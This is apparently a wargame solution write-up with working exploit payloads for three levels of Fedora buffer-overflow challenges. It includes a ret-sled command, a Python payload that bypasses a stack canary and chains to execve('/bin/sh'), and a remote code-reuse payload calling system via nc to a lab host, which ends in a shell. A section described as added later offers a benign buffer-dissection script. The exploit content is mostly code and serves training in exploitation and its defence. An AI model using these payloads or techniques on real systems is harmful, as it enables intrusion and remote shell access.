Solutions
Level 1
- upgraded simple buffer overflow
; no more fake ebp ; randomized library
; like the FC3 level 1 problem, use ret-to-ret (a ret sled) to escape the randomized stack
; with 12 rets, execve's second argument (argv) comes out NULL
; ret address : 0x08048451
; execve address : 0x00832abc
; for file name : 85 c0 75 53 65 a1 54
; payload : ln -s ./shell $(echo -en "\x85\xc0\x75\x53\x65\xa1\x54")
./cruel $(python -c 'print "A"*260 + "\x51\x84\x04\x08"*12 + "\xbc\x2a\x83\x00"')
Level 2
- canary + remote exploit + no NULL byte accepted + buffer cleaning + stdin
; stdin's address changes on every run, but it stays between 0xb7f00000 ~ 0xb7fff000
; so we may need to brute-force it, if it comes to that
; if you need to use shellcode on the stdin buffer, mprotect is needed
; but i don't want to make my payload long ~
;
; canary value : 0x31337
; execve address : 0x00832abc
; stdin address : 0xb7f
; leaveret address : 0x0804858e
; payload : while [ 1 ]; do (python ./exploit.py ; cat) | nc 192.168.254.131 7777; done
import sys
from struct import pack

p = lambda x: pack('<I', x)   # one 32-bit little-endian word

canary   = 0x31337            # canary value from the notes above
stdin    = 0xb7fc9000         # one guess inside the 0xb7f00000 ~ 0xb7fff000 range; the outer loop retries
execve   = 0x00832abc
leaveret = 0x0804858e

payload  = b"A" * 260
payload += p(stdin + 0x110)
payload += p(leaveret)
payload += p(canary)
payload += p(stdin + 0x10c)
payload += p(execve)
payload += b"A" * 4
payload += p(stdin + 0x128)
payload += p(stdin + 0x130)
payload += p(0x00)
payload += b"/bin/sh\x00"
payload += p(stdin + 0x130)
payload += p(0x00)

# write raw bytes; the trailing newline is what Python 2's print added
sys.stdout.buffer.write(payload + b"\n")
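Looking at the recorded payloads from the analysis side: the following is an added example (not from the original post) that dissects a captured input buffer into 4-byte little-endian words, labels the words that match the addresses noted for Level 1 and Level 2, measures the longest run of one repeated address (the ret-sled shape of the Level 1 payload), and lists the NUL offsets a strcpy/strlen-style reader would stop at (the constraint the Level 2 notes mention). The function names, the reference table and the constructed sample buffer are mine; the addresses in the table are the ones written in the notes above.

```python
from struct import pack, unpack
from typing import Dict, List, Tuple

# Reference table built from the addresses recorded in the Level 1 and Level 2
# notes; it is only used to label words, nothing here is executed.
KNOWN_WORDS: Dict[int, str] = {
    0x08048451: "ret gadget (Level 1 ret sled)",
    0x00832abc: "execve",
    0x0804858e: "leave; ret gadget (Level 2)",
    0x00031337: "canary value (Level 2)",
}

# The notes state the stdin buffer lands somewhere in this range on each run.
STDIN_LO, STDIN_HI = 0xb7f00000, 0xb7fff000

Word = Tuple[int, int, str]  # (offset, value, label)


def label_word(word: int) -> str:
    """Human-readable label for one 32-bit little-endian word."""
    if word in KNOWN_WORDS:
        return KNOWN_WORDS[word]
    if STDIN_LO <= word < STDIN_HI:
        return "pointer into stdin mapping range"
    if word == 0x41414141:
        return "filler AAAA"
    return "unknown"


def dissect(buf: bytes) -> List[Word]:
    """Split a captured buffer into labelled 4-byte little-endian words.

    A trailing partial word is dropped: the stack only consumes whole pointers.
    """
    words: List[Word] = []
    for off in range(0, len(buf) - 3, 4):
        (val,) = unpack("<I", buf[off:off + 4])
        words.append((off, val, label_word(val)))
    return words


def longest_run(words: List[Word]) -> Tuple[int, int]:
    """(length, value) of the longest run of identical consecutive words.

    A long run of one code address is the classic ret-sled shape.
    """
    best_len, best_val, cur_len = 0, 0, 0
    prev = None
    for _, val, _ in words:
        cur_len = cur_len + 1 if val == prev else 1
        prev = val
        if cur_len > best_len:
            best_len, best_val = cur_len, val
    return best_len, best_val


def nul_offsets(buf: bytes) -> List[int]:
    """Offsets of NUL bytes: where a strcpy/strlen-style reader would stop."""
    return [i for i, b in enumerate(buf) if b == 0]


def report(buf: bytes) -> dict:
    """Summarise one captured buffer for a triage note."""
    words = dissect(buf)
    run_len, run_val = longest_run(words)
    return {
        "filler_words": sum(1 for _, _, lab in words if lab == "filler AAAA"),
        "labelled": [(off, hex(val), lab) for off, val, lab in words
                     if lab not in ("unknown", "filler AAAA")],
        "longest_run": (run_len, hex(run_val)),
        "nul_offsets": nul_offsets(buf),
    }


# Constructed sample mimicking the Level 1 shape (short filler instead of 260
# bytes, then a 12-word ret sled, then the execve address from the notes).
SAMPLE_LEVEL1_SHAPE = b"A" * 8 + pack("<I", 0x08048451) * 12 + pack("<I", 0x00832abc)


if __name__ == "__main__":
    for key, value in report(SAMPLE_LEVEL1_SHAPE).items():
        print(key, value)
```

On the sample the report shows a run of 12 identical words and a single NUL at the very last byte (the high byte of the execve address), which is exactly the property the Level 2 notes call out: any address with a zero byte has to sit where a NUL is tolerated.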
Level 3
- Remote exploit + smaller buffer than before + stdin + can't use the buffer + RTL is prevented at ret
; static function ftn() ; 48 bytes into a 40-byte buffer -> buffer overflow
; we can control only 4 bytes ; ftn ~ ftn+3
; This time, a code reuse attack is what i use ; simply put, using
;
; system address : 0x007db0e7
; /bin/sh address : 0x008bd987
; add esp address : 0x0804854a
; payload : (python -c 'print "A"*40 + ("\x4a\x85\x04\x08" + "A"*3)*4 + ("A"*8 + "\xe7\xb0\x7d\x00" + "\x84\x08\x7d\x00" + "\x87\xd9\x8b\x00")'; cat) | nc 192.168.254.131 8888
ALL CLEAR!
[titan@Fedora_2ndFloor ~]$ ls
dropped_item.txt
[titan@Fedora_2ndFloor ~]$ cat ./*
,.
,' `.
,' _<>_ `.
,'.-'____`-.`.
,'_.-'' ``-._`.
,',' /\ `.`.
,' /.._ O / \ O _.,\ `.
,'/ / \ ``-;.--.:-'' / \ \`.
,' : : \ /\`.,'/\ / : : `.
< <>| | O >(< ( ) >)< O | |<> >
`. : : / \/,'`.\/ \ ; ; ,'
`.\ \ /_..-:`--';-.._\ / /,'
`. \`' O \ / O `'/ ,'
`.`._ \/ _,','
`..``-.____.-'',,'
`.`-.____.-','
`. <> ,'
`. ,'
`'
[titan@Fedora_2ndFloor ~]$